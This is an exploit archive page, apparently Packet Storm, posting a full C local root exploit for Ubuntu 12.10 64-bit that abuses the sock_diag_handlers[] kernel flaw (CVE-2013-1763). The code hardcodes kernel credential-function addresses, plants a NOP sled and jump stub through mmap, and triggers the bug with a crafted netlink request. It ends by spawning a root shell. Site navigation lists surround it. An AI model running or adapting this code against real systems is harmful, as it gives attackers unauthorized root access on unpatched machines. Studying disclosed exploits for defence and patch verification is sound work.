Ubuntu 12.10 64bit Local Root

Ubuntu 12.10 64bit Local Root: Posted Mar 11, 2013; Authored by Kacper Szczesniak; Local root exploit for Ubuntu 12.10 64bit that leverages the sock_diag_handlers[] vulnerability in Linux kernels before 3.7.10.; tags | exploit, kernel, local, root; systems | linux, ubuntu; advisories | CVE-2013-1763; SHA-256 | 8cb1664fe3e4114405f60c70992efc4583eb8c783e92650a7895c3f8aa6712b5; Download | Favorite | View

Ubuntu 12.10 64bit Local Root

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
x()
{
  commit_creds(prepare_kernel_cred(0));
  return -1;
}

char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

int main() {
  int fd;
    unsigned long mmap_start, mmap_size = 0x10000;
  unsigned family;
  struct {
    struct nlmsghdr nlh;
    struct unix_diag_req r;
  } req;
  char  buf[8192];

  if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
    printf("Can't create sock diag socket\n");
    return -1;
  }

  memset(&req, 0, sizeof(req));
  req.nlh.nlmsg_len = sizeof(req);
  req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
  req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
  req.nlh.nlmsg_seq = 123456;

  req.r.udiag_states = -1;
  req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

  /* Ubuntu 12.10 x86_64 */
  req.r.sdiag_family = 0x37;
  commit_creds = (_commit_creds) 0xffffffff8107d180;
  prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
    mmap_start = 0x1a000;

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

    printf("mmap fault\n");
    exit(1);
    }

    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

  send(fd, &req, sizeof(req), 0);
  if(!getuid())
    system("/bin/sh");
}

Top Authors In Last 30 Days

Red Hat 255 files
indoushka 93 files
Ubuntu 89 files
Gentoo 36 files
Jasper Nota 25 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,099)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,756)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,521)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,747)
UNIX (9,436)
UnixWare (187)
Windows (6,674)
Other

Ubuntu 12.10 64bit Local Root

Ubuntu 12.10 64bit Local Root

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Ubuntu 12.10 64bit Local Root

Share This

Ubuntu 12.10 64bit Local Root

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems